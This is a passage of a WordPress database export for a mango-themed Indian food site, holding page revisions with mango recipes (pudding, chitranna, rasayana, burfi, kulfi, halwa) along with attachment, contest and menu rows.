(do not boil).<br>Further add 1 cup cream and whisk well. Additionally add ½ cup powdered sugar, 1 tablespoon vanilla extract and pinch of salt. Whisk and dissolve the sugar completely.<br>Let the milk cool for 10 minutes before pouring to the glass.<br>Pour the milk into glass.<br>Refrigerate it for 2 hours or overnight, till it sets completely.<br>Finally, garnish with few chopped mangoes and enjoy mango panna cotta or mango pudding.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:heading -->\n<h2 id=\"mavinakayi-chitranna-recipe\"><strong>MAVINAKAYI CHITRANNA RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:image {\"align\":\"left\",\"id\":915,\"width\":-378,\"height\":-378,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<div class=\"wp-block-image\"><figure class=\"alignleft size-full is-resized\"><img src=\"https://mangomitra.in/wp-content/uploads/2022/02/Artboard-3-8.png\" alt=\"\" class=\"wp-image-915\" width=\"-378\" height=\"-378\"/></figure></div>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mavinakayi Chitranna Recipe is a delicious preparation of rice from the raw green mangoes that you get in the summers. The tartness of the mangoes along with the green chillies and the seasonings, brings out the flavors of this classic South Indian Rice recipe. While you’re probably enjoying the beautifully luscious ripe mangoes of the season, don’t forget to enjoy your share of the raw mangoes too by trying this Mavinakayi Chitranna Recipe. Summer feels incomplete without getting enough of the tangy hit of raw mangoes, balanced by hot spices,salt, lime and the right tempering, raw mangoes are delicious in a range of preparations.Serve the Mavinakayi Chitranna along with a Tomato Onion Cucumber Raita or High-Protein Peanut Chutney and a roasted papad for lunch or even for dinner. The Mavinakayi Chitranna makes a great picnic lunch too.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-rasayana\"><strong>MANGO RASAYANA</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:image {\"align\":\"left\",\"id\":920,\"width\":-470,\"height\":-470,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<div class=\"wp-block-image\"><figure class=\"alignleft size-full is-resized\"><img src=\"https://mangomitra.in/wp-content/uploads/2022/02/Artboard-5-8.png\" alt=\"\" class=\"wp-image-920\" width=\"-470\" height=\"-470\"/></figure></div>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Cut the mangoes into small cubes and keep them in a mixing bowl.<br>Squeeze and extract the remaining mango juice from the mangoes.<br>Next add coconut milk, jaggery, and cardamom powder. Mix well. Adjust the consistency of rasayana.<br>Serve chilled with dosa, poori, or chapati.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-seekarna\"><strong>MANGO SEEKARNA</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:image {\"align\":\"left\",\"id\":918,\"width\":-402,\"height\":-402,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<div class=\"wp-block-image\"><figure class=\"alignleft size-full is-resized\"><img src=\"https://mangomitra.in/wp-content/uploads/2022/02/Artboard-2-8.png\" alt=\"\" class=\"wp-image-918\" width=\"-402\" height=\"-402\"/></figure></div>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Seekarane with Holige, Poori, Dosa, chapati, or also can be eaten as it is.<br>Any variety of mangoes can be used, but try to choose sweet, juicy, and pulpy mangoes.<br>You can use white or brown sugar instead of jaggery. Adjust the jaggery based on the sweetness of the mango. I have made coconut milk at home using freshly shredded coconut but you can also use store brought coconut milk. You can also replace coconut milk with dairy milk or almond milk.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-burfi-recipe\"><strong>MANGO BURFI RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:image {\"id\":917,\"width\":212,\"height\":212,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"https://mangomitra.in/wp-content/uploads/2022/02/Artboard-1-8.png\" alt=\"\" class=\"wp-image-917\" width=\"212\" height=\"212\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Preparation Time : 5 minutes<br>Cook Time : 15 minutes<br>Total Time : 20 minutes<br>Servings : 24 pieces</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients-1\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>1 cup mango cubes<br>½ cup milk<br>1 cup sugar<br>3 cup coconut grated<br>¼ tablespoon cardamom powder</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructons\"><strong>INSTRUCTONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Firstly, in a blender take 1 cup mango and ½ cup milk.<br>Blend to smooth puree adding more milk if required.<br>Transfer the mango puree to large kadai.<br>Also add 1 cup sugar and mix until sugar dissolves completley.<br>Further add 3 cup coconut keep stirring till the mixture starts to thicken continue to cook on medium flame stirring continuously and after 15 minutes, coconut mixture will start to separate from pan.<br>Now add ¼ tablespoon cardamom powder and mix well.<br>Transfer the prepared mixture into a greased plate lined with baking paper set well forming a block and cut into pieces.<br>Finally, serve mango burfi / mango coconut barfi or store in airtight container for a week in the refrigerator.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-kulfi-recipe\"><strong>MANGO KULFI RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:image {\"align\":\"left\",\"id\":921,\"width\":-470,\"height\":-470,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<div class=\"wp-block-image\"><figure class=\"alignleft size-full is-resized\"><img src=\"https://mangomitra.in/wp-content/uploads/2022/02/Artboard-7-8.png\" alt=\"\" class=\"wp-image-921\" width=\"-470\" height=\"-470\"/></figure></div>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Indian mango kulfi is a instant dessert that is made with condensed milk, mango pulp and cream.<br>For best results follow my detailed step-by-step photo instructions and tips.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients-2\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>1 ½ cup mango pieces, cubed (use sweet mango)(1 medium)<br>½ tin sweetened condensed milk(milkmaid)<br>200 ml whipping cream or 250 ml cream(chilled)<br>1/4 tablespoon elaichi (cardamom powder)<br>1 pinch kesar (saffron) (optional for color)</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructions-1\"><strong>INSTRUCTIONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Soak kesar or saffron in 2 tablespoon hot water. This is optional.<br>Wash and peel mango. Chop them to cubes and add to a blender jar.<br>Add chilled cream, saffron, condensed milk and cardamom powder to the jar.<br>Blend on a medium speed until smooth.<br>Add chopped pistas. Give a good stir.<br>Pour the mixture to the kulfi moulds and refrigerate until set.<br>Rub the moulds in between your palm or dip them in a bowl of water.<br>Gently loosen and remove mango kulfi.<br>Garnish with crushed pista. Serve with love.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-halwa-recipe\"><strong>MANGO HALWA RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:image {\"id\":919,\"width\":200,\"height\":200,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"https://mangomitra.in/wp-content/uploads/2022/02/Artboard-4-8.png\" alt=\"\" class=\"wp-image-919\" width=\"200\" height=\"200\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Preparation Time :15 Mins<br>Cook Time :45 Mints<br>Makes :4-5 Perfect Squares &amp; Some Small Pieces</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients-2\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>2 and 3/4 cups Mango Pulp<br>1 tablespoon Ghee</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructions-1\"><strong>INSTRUCTIONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>In a heavy bottom vessel add the ghee and when it is hot add the mango pulp.<br>Keep stirring the mixture every 10-15 minutes so that it does not stick to the vessel.<br>The mixture will reduce in quantity, there will be a change in color and after 45 minutes transfer this mixture to a greased (with very little ghee) plate. I used 2 and 3/4 cups of pulp and it cooked down to 3/4ths of a cup approximately. So a very small plate is enough.<br>Left the plate undisturbed for one more hour and then cut it into pieces.<br>Garnish it with nuts of your choice.</p>\n<!-- /wp:paragraph --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div>\n<!-- /wp:group -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','Mango Recipes','','inherit','closed','closed','','745-revision-v1','','','2022-02-09 15:08:21','2022-02-09 09:38:21','',745,'https://mangomitra.in/?p=924',0,'revision','',0),(926,1,'2022-02-09 15:12:25','2022-02-09 09:42:25','','Artboard-7-8-1','','inherit','open','closed','','artboard-7-8-1','','','2022-02-09 15:12:25','2022-02-09 09:42:25','',745,'https://mangomitra.in/wp-content/uploads/2022/02/Artboard-7-8-1.png',0,'attachment','image/png',0),(927,1,'2022-02-09 15:15:15','2022-02-09 09:45:15','','Artboard-3-8-1','','inherit','open','closed','','artboard-3-8-1','','','2022-02-09 15:15:15','2022-02-09 09:45:15','',745,'https://mangomitra.in/wp-content/uploads/2022/02/Artboard-3-8-1.png',0,'attachment','image/png',0),(928,1,'2022-02-09 15:17:01','2022-02-09 09:47:01','','Artboard-5-8-1','','inherit','open','closed','','artboard-5-8-1','','','2022-02-09 15:17:01','2022-02-09 09:47:01','',745,'https://mangomitra.in/wp-content/uploads/2022/02/Artboard-5-8-1.png',0,'attachment','image/png',0),(929,1,'2022-02-09 15:18:10','2022-02-09 09:48:10','','Artboard-2-8-1','','inherit','open','closed','','artboard-2-8-1','','','2022-02-09 15:18:10','2022-02-09 09:48:10','',745,'https://mangomitra.in/wp-content/uploads/2022/02/Artboard-2-8-1.png',0,'attachment','image/png',0),(930,1,'2022-02-09 15:22:26','2022-02-09 09:52:26','','Artboard-7-8-2','','inherit','open','closed','','artboard-7-8-2','','','2022-02-09 15:22:26','2022-02-09 09:52:26','',745,'https://mangomitra.in/wp-content/uploads/2022/02/Artboard-7-8-2.png',0,'attachment','image/png',0),(931,1,'2022-02-09 15:23:43','2022-02-09 09:53:43','<!-- wp:group -->\n<div class=\"wp-block-group\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:heading -->\n<h2 id=\"mango-pudding-recipe\"><strong>MANGO PUDDING RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:image {\"id\":922,\"width\":183,\"height\":183,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"https://mangomitra.in/wp-content/uploads/2022/02/Artboard-6-8.png\" alt=\"\" class=\"wp-image-922\" width=\"183\" height=\"183\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Preparation Time : 4 hours<br>Cook Time :15 minutes<br>Total Time : 4 hours 15 minutes<br>Servings : 3 Servings</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>1 tsp agar-agar / gelatin / china grass<br>2 tsp hot water<br>2 cups mango puree<br>for cream layer:<br>1 cup milk full cream<br>1 tsp agar-agar / gelatin<br>½ cup sugar powdered<br>1 cup cream<br>1 tsp vanilla extract / vanilla essence<br>pinch of salt</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructions\"><strong>INSTRUCTIONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Firstly, in a large mixing bowl take 1 tablespoon of agar-agar / gelatin and add 2 tablespoon hot water.   Mix well and dissolve agar-agar completely.<br>Further add 2 cups of mango puree. Mix well making sure the pulp gets mixed up with agar-agar uniformly.<br>Furthermore, place the serving glass in a bowl so that it gets tilted slightly. Pour in prepared mango mixture till it reaches the rim.<br>Now refrigerate it for 2 hours or overnight, till it sets completely. After 2 hours, make sure to check the mango has set completely.<br>Now prepare cream layer by heating up milk.<br>Add in 1 tablespoon agar-agar / gelatin and whisk well.<br>Cook the milk on medium-low heat till it steams (do not boil).<br>Further add 1 cup cream and whisk well. Additionally add ½ cup powdered sugar, 1 tablespoon vanilla extract and pinch of salt. Whisk and dissolve the sugar completely.<br>Let the milk cool for 10 minutes before pouring to the glass.<br>Pour the milk into glass.<br>Refrigerate it for 2 hours or overnight, till it sets completely.<br>Finally, garnish with few chopped mangoes and enjoy mango panna cotta or mango pudding.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:heading -->\n<h2 id=\"mavinakayi-chitranna-recipe\"><strong>MAVINAKAYI CHITRANNA RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:image {\"id\":927,\"width\":225,\"height\":225,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"https://mangomitra.in/wp-content/uploads/2022/02/Artboard-3-8-1.png\" alt=\"\" class=\"wp-image-927\" width=\"225\" height=\"225\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Mavinakayi Chitranna Recipe is a delicious preparation of rice from the raw green mangoes that you get in the summers. The tartness of the mangoes along with the green chillies and the seasonings, brings out the flavors of this classic South Indian Rice recipe. While you’re probably enjoying the beautifully luscious ripe mangoes of the season, don’t forget to enjoy your share of the raw mangoes too by trying this Mavinakayi Chitranna Recipe. Summer feels incomplete without getting enough of the tangy hit of raw mangoes, balanced by hot spices,salt, lime and the right tempering, raw mangoes are delicious in a range of preparations.Serve the Mavinakayi Chitranna along with a Tomato Onion Cucumber Raita or High-Protein Peanut Chutney and a roasted papad for lunch or even for dinner. The Mavinakayi Chitranna makes a great picnic lunch too.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-rasayana\"><strong>MANGO RASAYANA</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:image {\"id\":928,\"width\":195,\"height\":195,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"https://mangomitra.in/wp-content/uploads/2022/02/Artboard-5-8-1.png\" alt=\"\" class=\"wp-image-928\" width=\"195\" height=\"195\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Cut the mangoes into small cubes and keep them in a mixing bowl.<br>Squeeze and extract the remaining mango juice from the mangoes.<br>Next add coconut milk, jaggery, and cardamom powder. Mix well. Adjust the consistency of rasayana.<br>Serve chilled with dosa, poori, or chapati.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-seekarna\"><strong>MANGO SEEKARNA</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:image {\"id\":929,\"width\":210,\"height\":210,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"https://mangomitra.in/wp-content/uploads/2022/02/Artboard-2-8-1.png\" alt=\"\" class=\"wp-image-929\" width=\"210\" height=\"210\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Seekarane with Holige, Poori, Dosa, chapati, or also can be eaten as it is.<br>Any variety of mangoes can be used, but try to choose sweet, juicy, and pulpy mangoes.<br>You can use white or brown sugar instead of jaggery. Adjust the jaggery based on the sweetness of the mango. I have made coconut milk at home using freshly shredded coconut but you can also use store brought coconut milk. You can also replace coconut milk with dairy milk or almond milk.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-burfi-recipe\"><strong>MANGO BURFI RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:image {\"id\":917,\"width\":212,\"height\":212,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"https://mangomitra.in/wp-content/uploads/2022/02/Artboard-1-8.png\" alt=\"\" class=\"wp-image-917\" width=\"212\" height=\"212\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Preparation Time : 5 minutes<br>Cook Time : 15 minutes<br>Total Time : 20 minutes<br>Servings : 24 pieces</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients-1\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>1 cup mango cubes<br>½ cup milk<br>1 cup sugar<br>3 cup coconut grated<br>¼ tablespoon cardamom powder</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructons\"><strong>INSTRUCTONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Firstly, in a blender take 1 cup mango and ½ cup milk.<br>Blend to smooth puree adding more milk if required.<br>Transfer the mango puree to large kadai.<br>Also add 1 cup sugar and mix until sugar dissolves completley.<br>Further add 3 cup coconut keep stirring till the mixture starts to thicken continue to cook on medium flame stirring continuously and after 15 minutes, coconut mixture will start to separate from pan.<br>Now add ¼ tablespoon cardamom powder and mix well.<br>Transfer the prepared mixture into a greased plate lined with baking paper set well forming a block and cut into pieces.<br>Finally, serve mango burfi / mango coconut barfi or store in airtight container for a week in the refrigerator.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-kulfi-recipe\"><strong>MANGO KULFI RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:image {\"id\":930,\"width\":201,\"height\":201,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"https://mangomitra.in/wp-content/uploads/2022/02/Artboard-7-8-2.png\" alt=\"\" class=\"wp-image-930\" width=\"201\" height=\"201\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Indian mango kulfi is a instant dessert that is made with condensed milk, mango pulp and cream.<br>For best results follow my detailed step-by-step photo instructions and tips.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients-2\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>1 ½ cup mango pieces, cubed (use sweet mango)(1 medium)<br>½ tin sweetened condensed milk(milkmaid)<br>200 ml whipping cream or 250 ml cream(chilled)<br>1/4 tablespoon elaichi (cardamom powder)<br>1 pinch kesar (saffron) (optional for color)</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructions-1\"><strong>INSTRUCTIONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Soak kesar or saffron in 2 tablespoon hot water. This is optional.<br>Wash and peel mango. Chop them to cubes and add to a blender jar.<br>Add chilled cream, saffron, condensed milk and cardamom powder to the jar.<br>Blend on a medium speed until smooth.<br>Add chopped pistas. Give a good stir.<br>Pour the mixture to the kulfi moulds and refrigerate until set.<br>Rub the moulds in between your palm or dip them in a bowl of water.<br>Gently loosen and remove mango kulfi.<br>Garnish with crushed pista. Serve with love.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-halwa-recipe\"><strong>MANGO HALWA RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:image {\"id\":919,\"width\":200,\"height\":200,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"https://mangomitra.in/wp-content/uploads/2022/02/Artboard-4-8.png\" alt=\"\" class=\"wp-image-919\" width=\"200\" height=\"200\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Preparation Time :15 Mins<br>Cook Time :45 Mints<br>Makes :4-5 Perfect Squares &amp; Some Small Pieces</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients-2\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>2 and 3/4 cups Mango Pulp<br>1 tablespoon Ghee</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructions-1\"><strong>INSTRUCTIONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>In a heavy bottom vessel add the ghee and when it is hot add the mango pulp.<br>Keep stirring the mixture every 10-15 minutes so that it does not stick to the vessel.<br>The mixture will reduce in quantity, there will be a change in color and after 45 minutes transfer this mixture to a greased (with very little ghee) plate. I used 2 and 3/4 cups of pulp and it cooked down to 3/4ths of a cup approximately. So a very small plate is enough.<br>Left the plate undisturbed for one more hour and then cut it into pieces.<br>Garnish it with nuts of your choice.</p>\n<!-- /wp:paragraph --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div>\n<!-- /wp:group -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','Mango Recipes','','inherit','closed','closed','','745-revision-v1','','','2022-02-09 15:23:43','2022-02-09 09:53:43','',745,'https://mangomitra.in/?p=931',0,'revision','',0),(932,1,'2022-02-09 15:27:23','2022-02-09 09:57:23','<!-- wp:shortcode -->\n[totalcontest contest=\"900\"]\n<!-- /wp:shortcode -->','Contest','','inherit','closed','closed','','902-revision-v1','','','2022-02-09 15:27:23','2022-02-09 09:57:23','',902,'https://mangomitra.in/?p=932',0,'revision','',0),(933,1,'2022-02-09 16:54:03','2022-02-09 11:24:03','<!-- wp:mobiloud/heading {\"fontFamily\":\"Merriweather\",\"fontSize\":2.7,\"titleText\":\"List of Posts\"} /-->\n\n				<!-- wp:mobiloud/posts {\"highlightFirstPost\":true,\"infiniteScroll\":true,\"showTaxonomies\":{\"category\":true,\"post_tag\":true},\"selectedTerms\":{\"category\":[{\"label\":\"Uncategorized\",\"value\":1},{\"label\":\"food\",\"value\":19},{\"label\":\"offer\",\"value\":20}]}} /-->','Home screen list','','publish','closed','closed','','home-screen-list','','','2022-02-09 16:54:03','2022-02-09 11:24:03','',0,'https://mangomitra.in/?p=933',0,'list-builder','',0),(934,1,'2022-02-09 16:54:03','2022-02-09 11:24:03','','About Us','','publish','closed','closed','','about-us','','','2022-02-09 16:54:03','2022-02-09 11:24:03','',0,'https://mangomitra.in/?p=934',0,'app-pages','',0),(935,1,'2022-02-09 16:54:03','2022-02-09 11:24:03','','Contact','','publish','closed','closed','','contact','','','2022-02-09 16:54:03','2022-02-09 11:24:03','',0,'https://mangomitra.in/?p=935',0,'app-pages','',0),(936,1,'2022-02-09 16:54:03','2022-02-09 11:24:03','','Privacy Policy','','publish','closed','closed','','privacy-policy','','','2022-02-09 16:54:03','2022-02-09 11:24:03','',0,'https://mangomitra.in/?p=936',0,'app-pages','',0),(937,1,'2022-02-09 16:54:03','2022-02-09 11:24:03',' ','','','publish','closed','closed','','937','','','2022-02-09 16:54:03','2022-02-09 11:24:03','',0,'https://mangomitra.in/2022/02/09/937/',0,'nav_menu_item','',0),(938,1,'2022-02-09 16:54:04','2022-02-09 11:24:04',' ','','','publish','closed','closed','','938','','','2022-02-09 16:54:04','2022-02-09 11:24:04','',0,'https://mangomitra.in/2022/02/09/938/',2,'nav_menu_item','',0),(939,1,'2022-02-09 16:54:04','2022-02-09 11:24:04',' ','','','publish','closed','closed','','939','','','2022-02-09 16:54:04','2022-02-09 11:24:04','',0,'https://mangomitra.in/2022/02/09/939/',3,'nav_menu_item','',0),(940,1,'2022-02-09 16:54:04','2022-02-09 11:24:04',' ','','','publish','closed','closed','','940','','','2022-02-09 16:54:04','2022-02-09 11:24:04','',0,'https://mangomitra.in/2022/02/09/940/',0,'nav_menu_item','',0),(941,1,'2022-02-09 16:54:04','2022-02-09 11:24:04',' ','','','publish','closed','closed','','941','','','2022-02-09 16:54:04','2022-02-09 11:24:04','',0,'https://mangomitra.in/2022/02/09/941/',2,'nav_menu_item','',0),(942,1,'2022-02-09 16:54:05','2022-02-09 11:24:05',' ','','','publish','closed','closed','','942','','','2022-02-09 16:54:05','2022-02-09 11:24:05','',0,'https://mangomitra.in/2022/02/09/942/',3,'nav_menu_item','',0),(943,1,'2022-02-09 16:54:05','2022-02-09 11:24:05',' ','','','publish','closed','closed','','943','','','2022-02-09 16:54:05','2022-02-09 11:24:05','',0,'https://mangomitra.in/2022/02/09/943/',0,'nav_menu_item','',0),(944,1,'2022-02-09 16:54:05','2022-02-09 11:24:05',' ','','','publish','closed','closed','','944','','','2022-02-09 16:54:05','2022-02-09 11:24:05','',0,'https://mangomitra.in/2022/02/09/944/',2,'nav_menu_item','',0),(945,1,'2022-02-09 16:54:06','2022-02-09 11:24:06',' ','','','publish','closed','closed','','945','','','2022-02-09 16:54:06','2022-02-09 